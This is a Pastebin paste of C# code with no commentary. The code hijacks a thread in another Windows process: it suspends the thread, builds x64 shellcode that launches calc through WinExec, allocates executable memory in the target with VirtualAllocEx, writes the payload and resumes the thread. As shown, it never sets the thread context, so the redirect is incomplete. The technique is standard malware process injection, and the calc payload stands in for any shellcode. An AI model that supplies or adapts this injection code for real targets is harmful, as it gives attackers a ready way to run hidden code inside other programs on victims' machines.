API tools faq
paste
Guest User

Untitled

a guest
May 25th, 2018
109
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.28 KB | None | 0 0
raw download clone embed print report
  1. Process targetProcess = Process.GetProcessesByName(Processname)[0];
  2. ProcessThread pT = targetProcess.Threads[0];
  3. IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
  4. SuspendThread(pOpenThread);
  5. CONTEXT64 tContext = new CONTEXT64();
  6. tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
  7. if (GetThreadContext(pOpenThread, ref tContext))
  8. {
  9. MessageBox.Show("CurrentEip : {0}", tContext.Rip.ToString());
  10. }
  11. byte[] payload = new byte[112] {
  12. 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
  13. };
  14. byte[] mov_rax = new byte[2] {
  15. 0x48, 0xb8
  16. };
  17. byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
  18. byte[] jmp_rax = new byte[2] {
  19. 0xff, 0xe0
  20. };
  21. byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
  22. payload.CopyTo(shellcode, 0);
  23. mov_rax.CopyTo(shellcode, payload.Length);
  24. jmp_address.CopyTo(shellcode, payload.Length + mov_rax.Length);
  25. jmp_rax.CopyTo(shellcode, payload.Length + mov_rax.Length + jmp_address.Length);
  26. IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
  27. IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  28. UIntPtr bytesWritten;
  29. bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
  30. MessageBox.Show("Redirecting execution!");
  31. ResumeThread(pOpenThread);
  32. return;
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!